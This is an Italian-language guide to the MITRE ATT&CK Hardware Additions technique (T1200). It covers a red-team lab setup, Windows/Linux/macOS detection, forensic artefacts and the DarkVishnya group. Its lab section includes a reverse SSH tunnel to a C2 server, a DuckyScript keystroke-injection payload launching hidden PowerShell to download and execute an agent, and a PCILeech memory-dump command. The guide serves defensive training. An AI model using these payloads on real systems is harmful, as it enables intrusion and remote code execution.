Dispositivi Hardware Malevoli: Hardware Additions (T1200)

L'obiettivo in laboratorio è simulare l'intera catena: collegamento fisico, enumerazione della rete locale, e pivot verso risorse interne. Servono dispositivi reali e un ambiente controllato con VLAN segmentate.

Piattaforme di attacco fisico

Il punto di partenza più comune è Bash Bunny di Hak5 (a pagamento), un dispositivo USB che emula contemporaneamente tastiera HID, storage di massa e adattatore Ethernet. Inserendolo in una workstation sbloccata, può eseguire payload DuckyScript in pochi secondi. In alternativa, P4wnP1 A.L.O.A. (open source) trasforma un Raspberry Pi Zero W in un impianto multi-funzione: HID, Ethernet over USB, Wi-Fi rogue AP. La configurazione avviene via interfaccia web integrata.

Per simulare lo scenario DarkVishnya — il gruppo che ha fisicamente collegato Bash Bunny, Raspberry Pi e netbook economici alla rete locale delle organizzazioni target — il setup ideale prevede un Raspberry Pi con sistema operativo Kali Linux connesso via cavo Ethernet a una porta di rete in un'area comune (sala riunioni, stampanti). Il dispositivo ottiene un lease DHCP e apre un tunnel reverse SSH verso un server C2 esterno.

Catena d'attacco passo per passo

Una volta connesso il Raspberry Pi alla rete, la sequenza operativa si sviluppa così. Prima si verifica la connettività e l'indirizzo ottenuto:

ip addr show eth0

Poi si avvia la scansione della subnet locale con Nmap (open source) per identificare host attivi e servizi esposti:

nmap -sn 192.168.1.0/24 -oG discovery.txt

Il passo successivo è stabilire persistenza con un tunnel reverse SSH verso il server C2 controllato dal red team:

ssh -R 4443:localhost:22 operatore@c2-server -fN

Per lo scenario keystroke injection con Bash Bunny, un payload DuckyScript minimale apre PowerShell e scarica un agent:

DELAY 2000 GUI r DELAY 500 STRING powershell -w hidden -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('')" ENTER

Scenari DMA e rogue access point

Per testare attacchi DMA via Thunderbolt, PCILeech (open source) consente la lettura diretta della memoria del kernel tramite schede FPGA collegate a porte Thunderbolt o M.2. Il comando base per il dump della memoria fisica è:

pcileech dump -out memory.raw -device fpga

Infine, per il rogue wireless AP, hostapd (open source) su Raspberry Pi crea un punto d'accesso con SSID identico a quello aziendale, combinato con dnsmasq (open source) per il DHCP. Questo simula l'aggiunta di infrastruttura wireless non autorizzata alla rete.

Documentate ogni passo con screenshot e timestamp: il report deve dimostrare che un accesso fisico non controllato equivale a un accesso logico completo.

La detection di dispositivi hardware malevoli richiede la correlazione di eventi provenienti da fonti eterogenee: log di sistema operativo, DHCP, network monitoring. Il segreto è costruire catene di correlazione temporale piuttosto che affidarsi a singoli alert.

La catena di detection su Windows

Il cuore della rilevazione è l'Event ID 6416 del Security Log, che registra il riconoscimento di un nuovo dispositivo esterno. Questo evento va correlato con Sysmon, in particolare l'Event ID 3 (connessione di rete) e l'Event ID 1 (creazione di processo) per identificare attività sospette entro una finestra temporale di 10-60 minuti dall'inserimento. L'Event ID 20001 del Device Setup Manager nel System Log conferma l'installazione di un driver per il nuovo dispositivo.

La regola SIEM ideale segue questa logica: nuovo dispositivo USB/Thunderbolt riconosciuto → mount di un volume o comparsa di una nuova interfaccia di rete → processo figlio inatteso dalla stessa sessione utente. Tre eventi, una sola storia.

Parametri di tuning critici

La gestione dei falsi positivi passa attraverso whitelist ben curate:

• TrustedDeviceVIDPID: Vendor ID e Product ID dei dispositivi approvati (tastiere, mouse, docking station aziendali). Ogni VID:PID sconosciuto o raro alza il livello di rischio.
• ExpectedBusTypes: Tipologie di bus consentite per classe di server. Le porte USB dovrebbero essere disabilitate su Domain Controller e hypervisor; qualsiasi inserimento genera alert immediato.
• TrustedMACs: MAC address delle NIC USB e degli adattatori Ethernet autorizzati. Una nuova interfaccia di rete che ottiene un lease DHCP con MAC sconosciuto è un indicatore ad alta fedeltà.

Linux e macOS

Su Linux, il sottosistema udev e i log del kernel registrano ogni hot-plug. Auditd con regole SYSCALL su operazioni open/creat verso /dev cattura la creazione di nuovi block device. La correlazione con i log DHCP e i flussi di rete via Zeek (open source) completa il quadro: un nuovo dispositivo che genera traffico di rete è significativamente più sospetto di una semplice chiavetta di storage.

Su macOS, i log unificati dei subsystem IOUSBHost, IOKit e diskarbitrationd tracciano l'arrivo di dispositivi e il mount di volumi. Le policy MDM definiscono i comportamenti attesi per media esterni e modalità Thunderbolt; ogni deviazione genera un alert.

Controlli preventivi

L'implementazione di 802.1X con certificati per dispositivi limita drasticamente la capacità di un hardware non autorizzato di ottenere connettività di rete. Combinato con segmentazione VLAN e restrizione dei lease DHCP ai soli dispositivi registrati, si crea una barriera che non è impossibile da aggirare, ma che rallenta l'attaccante e genera rumore rilevabile.

L'analisi forense di un attacco tramite hardware additions è peculiare: il dispositivo potrebbe essere stato già rimosso quando inizia l'indagine. La sfida è ricostruire la sua presenza e le sue azioni attraverso le tracce residue nei log di sistema e nella telemetria di rete.

Artefatti Windows

Il registro di sistema è la fonte primaria. La chiave HKLM\SYSTEM\CurrentControlSet\Enum\USB conserva un record per ogni dispositivo USB mai connesso, inclusi Vendor ID, Product ID e numero seriale. La chiave HKLM\SYSTEM\MountedDevices mappa i volumi montati ai dispositivi fisici. Il file setupapi.dev.log (in C:\Windows\INF) registra con timestamp preciso ogni installazione di driver — fondamentale per collocare l'inserimento del dispositivo sulla timeline.

L'Event ID 6416 nel Security Log documenta il momento esatto del riconoscimento, mentre il System Log con Event ID 20001 conferma il caricamento del driver. Se il dispositivo ha emulato una tastiera HID per keystroke injection, Sysmon Event ID 1 cattura i processi generati dai comandi iniettati — tipicamente PowerShell o cmd.exe lanciati dalla sessione utente senza interazione manuale visibile.

Per dispositivi che creano interfacce di rete, il log DHCP del server registra il lease con il MAC address dell'adattatore. Questo è un artefatto cruciale: i MAC di adattatori USB-Ethernet economici o di Raspberry Pi hanno OUI riconoscibili (ad esempio il prefisso B8:27:EB per i Raspberry Pi meno recenti o DC:A6:32 per i modelli 4).

Artefatti Linux

Il file /var/log/syslog o journal registra gli eventi udev di hot-plug con dettagli sul dispositivo. Auditd, se configurato, cattura le syscall di apertura verso i nuovi device node in /dev. Per ricostruire la sequenza, si filtra il journal per le unità usb e thunderbolt:

journalctl -k | grep -i "usb|thunderbolt"

I lease DHCP concessi dal server interno e i flussi NetFlow o Zeek completano la timeline di rete, mostrando quando il dispositivo ha iniziato a comunicare e con quali destinazioni.

Artefatti macOS

I log unificati filtrati per i subsystem IOUSBHost e diskarbitrationd mostrano arrivo e mount dei dispositivi. Il database KnowledgeC può contenere riferimenti temporali all'attività dell'utente durante l'inserimento. FSEvents traccia le modifiche al filesystem provocate dal mount di volumi esterni.

Ricostruzione della timeline

Lo schema investigativo per un caso DarkVishnya-like prevede quattro fasi sulla timeline: primo contatto hardware (setupapi/udev), ottenimento dell'indirizzo di rete (DHCP lease), scansione della rete locale (flussi Zeek/NetFlow anomali dalla nuova interfaccia), e tunnel C2 in uscita (connessioni SSH o HTTPS persistenti verso IP esterni). Ogni fase lascia artefatti in fonti diverse: la correlazione temporale tra registro USB, log DHCP e flussi di rete è la chiave per dimostrare che un singolo dispositivo fisico ha generato l'intera catena d'attacco.

La tecnica Hardware Additions occupa una posizione particolare nel panorama delle minacce: richiede accesso fisico al target, il che la rende rara nelle campagne APT documentate pubblicamente ma estremamente efficace quando impiegata. Il framework documenta un solo gruppo che l'ha utilizzata in operazioni confermate.

DarkVishnya (G0105)

DarkVishnya è il caso di studio principale per questa tecnica. Il gruppo ha condotto attacchi contro istituzioni finanziarie dell'Europa orientale introducendo fisicamente dispositivi nelle sedi aziendali. La particolarità dell'approccio risiede nella varietà dell'hardware impiegato: Bash Bunny per l'injection rapida, Raspberry Pi come impianto persistente con connettività wireless, e persino netbook e laptop economici collegati direttamente alla rete cablata.

Il modus operandi prevedeva che un operatore — potenzialmente un insider, un visitatore o qualcuno che si spacciava per personale di manutenzione — collegasse il dispositivo a una porta di rete accessibile. Una volta ottenuto l'accesso alla LAN, il dispositivo stabiliva un canale di comunicazione verso l'esterno, consentendo agli operatori remoti di esplorare la rete interna, muoversi lateralmente e raggiungere i sistemi finanziari critici.

Pattern operativi e implicazioni

L'uso di hardware fisico come vettore di Initial Access suggerisce un profilo di threat actor con capacità di intelligence umana (HUMINT): la fase di ricognizione include l'identificazione di punti di accesso fisico non sorvegliati, la mappatura delle porte di rete attive, e potenzialmente il reclutamento o l'impersonificazione di personale autorizzato.

Dal punto di vista dell'overlap dei tool, i dispositivi impiegati da DarkVishnya sono gli stessi utilizzati dai penetration tester professionisti — il che rende l'attribuzione basata esclusivamente sul tooling praticamente impossibile. La discriminante diventa il targeting: istituzioni finanziarie, con obiettivi che puntano direttamente ai sistemi di pagamento e trasferimento fondi.

Indicatori di evoluzione

Per il threat intelligence officer, il monitoraggio dovrebbe concentrarsi su diversi aspetti. La convergenza tra minacce cyber e fisiche rappresenta un trend in crescita: le organizzazioni con sedi distribuite, uffici ad accesso semi-pubblico o alta rotazione di consulenti esterni presentano una superficie d'attacco fisica più ampia. I settori finanziario, governativo e delle infrastrutture critiche restano i bersagli più probabili per attacchi che giustificano il rischio operativo di un accesso fisico.

La miniaturizzazione dell'hardware implantabile rende la detection visiva sempre più difficile: un dispositivo delle dimensioni di un adattatore USB-Ethernet legittimo può contenere un SoC completo con stack di rete, Wi-Fi e capacità di tunneling. Il monitoraggio delle supply chain di dispositivi come Bash Bunny, LAN Turtle e analoghi — attraverso forum underground e marketplace — può fornire indicatori anticipatori di campagne in preparazione.

Framework MITRE ATT&CK v16 — Tecnica T1200, Tattica TA0001, Gruppo G0105, Mitigazioni M1034 e M1035, Detection DET0069 con analitiche AN0185 (Windows), AN0186 (Linux), AN0187 (macOS). Integrato con conoscenza professionale per tool e procedure operative.